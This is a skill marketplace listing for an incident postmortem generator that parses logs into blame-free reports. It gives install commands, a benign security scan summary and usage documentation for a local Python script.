ClawHub

Incident Postmortem Generator

v1.0.0

Generate structured, blame-free incident postmortem reports from logs, timeline data, and incident metadata. Produces root cause analysis, impact assessment,...

0· 85·0 current·0 all-time
by@charlie-morrison·duplicate of @charlie-morrison/ops-incident-postmortem

Install

OpenClaw Prompt Flow

Install with OpenClaw

Best for remote or guided setup. Copy the exact prompt, then paste it into OpenClaw for charlie-morrison/incident-postmortem-generator.

Previewing Install & Setup.
Prompt PreviewInstall & Setup
Install the skill "Incident Postmortem Generator" (charlie-morrison/incident-postmortem-generator) from ClawHub.
Skill page: https://clawhub.ai/charlie-morrison/incident-postmortem-generator
Keep the work scoped to this skill only.
After install, inspect the skill metadata and help me finish setup.
Use only the metadata you can verify from ClawHub; do not invent missing requirements.
Ask before making any broader environment changes.

Command Line

CLI Commands

Use the direct CLI path if you want to install manually and keep every step visible.

OpenClaw CLI

Bare skill slug

openclaw skills install incident-postmortem-generator

ClawHub CLI

Package manager switcher

npx clawhub@latest install incident-postmortem-generator
Security Scan
Capability signals
CryptoCan make purchases
These labels describe what authority the skill may exercise. They are separate from suspicious or malicious moderation verdicts.
VirusTotalVirusTotal
Benign
View report →
OpenClawOpenClaw
Benign
high confidence
Purpose & Capability
Name/description, SKILL.md examples, and the included Python script all focus on parsing logs, merging timeline JSON, checking blameful language, and rendering outputs. No unrelated binaries, cloud credentials, or external services are requested—requirements and capabilities are coherent.
Instruction Scope
Runtime instructions and the script read arbitrary log and JSON files (examples reference /var/log/* and passing --log, --from, --timeline paths). This is expected for a log-parsing postmortem tool, but it means the tool will access any files you point it to; that can expose sensitive data (secrets, PII) if logs contain them. There are no instructions to exfiltrate data or send it to external endpoints in the provided files.
Install Mechanism
No install spec is provided (instruction-only plus a bundled Python script). No external downloads, package registry installs, or archive extraction are present—risk from installation mechanism is low. The script claims to use only Python stdlib.
Credentials
The skill declares no required environment variables, credentials, or config paths. The script operates on files provided via CLI flags and does not require secrets; this is proportionate to the stated functionality.
Persistence & Privilege
The skill is not always-enabled and does not request elevated or persistent privileges. It does not modify other skills or system-wide agent settings in the provided materials. Autonomous invocation is allowed by platform default but not exceptional here.
Assessment
This skill appears to do what it says: parse logs, merge timelines, and produce postmortems. Before installing or running it in production: (1) review the bundled script to confirm there are no network calls or unexpected behavior (the provided code shows none), (2) run it with least privilege and only on logs you intend to process (logs often contain credentials or PII), (3) avoid pointing it at directories you don't control, and (4) if you plan to store outputs centrally (HTML/JSON), ensure the destination is trusted. If you need higher assurance, run the script in an isolated environment and/or audit the remainder of the script (the truncated portion appears to be report formatting; verify there are no hidden endpoints).

Like a lobster shell, security has layers — review code before you run it.

latestvk97e5c5j9pxdecxg09rq29a3rx84s70d
85downloads
0stars
1versions
Updated 2w ago
v1.0.0
MIT-0
@charlie-morrison
latest
Download

Incident Postmortem

Generate structured, blame-free incident postmortem reports with timeline reconstruction, log analysis, and action item tracking.

Quick Start

# Create a postmortem from scratch (fills in template sections)
python3 scripts/generate_postmortem.py --title "Database outage" --severity P1

# Parse logs to auto-extract timeline events
python3 scripts/generate_postmortem.py --title "API latency" --log /var/log/app.log --since 2h

# Load a complete incident from JSON
python3 scripts/generate_postmortem.py --from incident.json --output html -o postmortem.html

# Combine logs + manual timeline
python3 scripts/generate_postmortem.py --title "Deploy failure" --log /var/log/deploy.log --timeline events.json

# Check existing document for blameful language
python3 scripts/generate_postmortem.py --check-blame existing-report.md

Features

  1. Log parsing — Auto-detects syslog, JSON, Apache/Nginx, Python tracebacks, Docker, generic timestamped formats. Extracts errors, warnings, and notable events into a timeline.
  2. Timeline reconstruction — Merges log-extracted events with manual timeline JSON. Sorted chronologically with event type labels (detection, action, escalation, resolution).
  3. Blame-free language — Built-in checker scans for blameful patterns and suggests alternatives. Use --check-blame on any document.
  4. Severity classification — P0 (critical) through P3 (low) with appropriate descriptions.
  5. Multiple outputs — Markdown (default), HTML (styled), JSON (structured).
  6. CI-friendly exit codes — 0 (clean), 1 (errors found), 2 (critical severity).
  7. Template sections — Summary, impact, timeline, root cause, detection, resolution, lessons learned, action items.

Options

FlagDefaultDescription
--titlerequiredIncident title
--severityP2P0, P1, P2, or P3
--datetodayIncident date
--durationTBDHow long it lasted
--summaryBrief summary text
--logLog file path (repeatable)
--sinceallTime filter for logs (1h, 24h, 7d)
--timelineTimeline JSON file
--fromLoad full incident from JSON
--outputmarkdownOutput format: markdown, html, json
-ostdoutOutput file path
--check-blameCheck file for blameful language

Workflow

After an Incident

  1. Gather logs: --log /var/log/app.log --log /var/log/nginx/error.log --since 4h
  2. Generate draft: python3 scripts/generate_postmortem.py --title "..." --severity P1 --log ... -o draft.md
  3. Fill in template sections (summary, root cause, impact, resolution)
  4. Run blame check: --check-blame draft.md
  5. Add action items and share

From Structured Data

  1. Create incident.json with full details (see references/templates.md for schema)
  2. Generate: --from incident.json --output html -o postmortem.html

Periodic Review

Use JSON output to track action item completion across multiple postmortems.

References

  • templates.md — Full JSON schema, timeline event types, blame-free language guide with replacements

Comments

Loading comments...